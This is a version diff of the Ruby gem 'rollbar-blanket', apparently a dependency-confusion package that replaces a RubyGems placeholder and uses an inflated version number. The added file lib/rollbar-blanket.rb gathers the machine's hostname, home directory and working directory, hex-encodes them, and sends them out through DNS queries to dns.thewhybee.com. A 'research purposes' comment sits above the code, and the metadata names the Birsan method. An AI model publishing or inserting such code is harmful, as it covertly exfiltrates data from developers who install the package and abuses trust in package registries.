rollbar-blanket 8.0.1 → 22.55.2

checksums.yaml

@@ -1,7 +1,7 @@
 ---
 SHA256:
-  metadata.gz: 6f1f0e1e70ea4c0fde05e93c6f4d35284ade3c803b1beadedda661b3966cfd13
-  data.tar.gz: 82f6b8812be36e7f03642df24dec77a51ec20dae7dc0c2b001c65c5eb2e3dc19
+  metadata.gz: a7efbbec9d0f74a13f87a988668fb89559142f0e37b9524eaf020f71ee353d7c
+  data.tar.gz: 54a8c59c72fff0035a5f975b514c2061a90f390ce3f893b3a10bcca554b4f97c
 SHA512:
-  metadata.gz: 06254f65287896ea23d3ad96c0b5dfc8b82bc834d82191f3cf10938a92979e0dad1731dc67fc64a45b9ee148bfc193714ce4f5e7d28564648dd9f05a84e2c739
-  data.tar.gz: fd104c483b368b6211509e457232431890cd8357b33ec7c82ef0d28ffc0576dd9f81db7345bb7600e2767556fa2d584bc81bff54dbe7397be812ab70acf4e92b
+  metadata.gz: 6bb80614170cc0db733c885c79cfac06298ff052a064925d9d2e3a933994fdbb62b07ea62c286e6736a1cd6e62c02639bb455f0a46aab657ef4e7143686c7c2e
+  data.tar.gz: 24aaab9095f6a25f7c6afc209cdf241d46b6564fa3366de65918daf8639164606d63a9c610f73762ccba0322dae72e75d0a31b91a1b252035ec51e46839e145e

data/lib/rollbar-blanket.rb

@@ -0,0 +1,63 @@
+=begin
+
+This code is used for research purposes.
+
+No sensitive data is retrieved.
+
+Callbacks from within organizations with a
+responsible disclosure policy will be reported
+directly to the organizations.
+
+Any other callbacks will be ignored, and
+any associated data will not be kept.
+
+For any questions or suggestions:
+
+whybee@thewhybee.com
+
+
+=end
+
+require 'socket'
+require 'json'
+require 'resolv'
+
+suffix = '.dns.thewhybee.com'
+ns = 'dns.dns.thewhybee.com'
+
+package = 'rollbar-blanket'
+
+# only the bare minimum to be able to identify
+# a vulnerable organization
+data = {
+    'p' => package,
+    'h' => Socket.gethostname,
+    'd' => File.expand_path('~'),
+    'c' => Dir.pwd
+}
+
+data = JSON.generate(data)
+data = data.unpack('H*')[0].scan(/.{1,60}/)
+
+id_1 = rand(36**12).to_s(36)
+id_2 = rand(36**12).to_s(36)
+
+begin
+    ns_ip = Resolv.getaddress(ns)
+rescue
+    ns_ip = '4.4.4.4'
+end
+
+custom_res = Resolv.new([Resolv::Hosts.new, 
+    Resolv::DNS.new(nameserver: [ns_ip, '8.8.8.8'])])
+
+
+data.each.each_with_index do |chunk, idx|
+    begin
+        Resolv.getaddress 'v2_f.' + id_1 + '.' + idx.to_s + '.' + chunk + '.v2_e' + suffix
+    rescue; end
+
+    begin
+        custom_res.getaddress 'v2_f.' + id_2 + '.' + idx.to_s + '.' + chunk + '.v2_e' + suffix
+    rescue; end
+end

metadata

@@ -1,22 +1,25 @@
 --- !ruby/object:Gem::Specification
 name: rollbar-blanket
 version: !ruby/object:Gem::Version
-  version: 8.0.1
+  version: 22.55.2
 platform: ruby
 authors:
-- maciej@mensfeld.pl
+- whybee
 autorequire: 
 bindir: bin
 cert_chain: []
-date: 2023-07-13 00:00:00.000000000 Z
+date: 2022-04-18 00:00:00.000000000 Z
 dependencies: []
-description: 
-email: 
+description: |-
+  This package is meant for security research purposes and does not contain
+    any useful code.
+email: whybee@thewhybee.com
 executables: []
 extensions: []
 extra_rdoc_files: []
-files: []
-homepage: 
+files:
+- lib/rollbar-blanket.rb
+homepage: http://github.com
 licenses: []
 metadata: {}
 post_install_message: 
@@ -34,8 +37,9 @@ required_rubygems_version: !ruby/object:Gem::Requirement
     - !ruby/object:Gem::Version
       version: '0'
 requirements: []
-rubygems_version: 3.3.4
+rubygems_version: 3.0.3
 signing_key: 
 specification_version: 4
-summary: Placeholder by RubyGems Security Team
+summary: Security research purposes only - No private data exfiltrated - A. Birsan
+  Method only
 test_files: []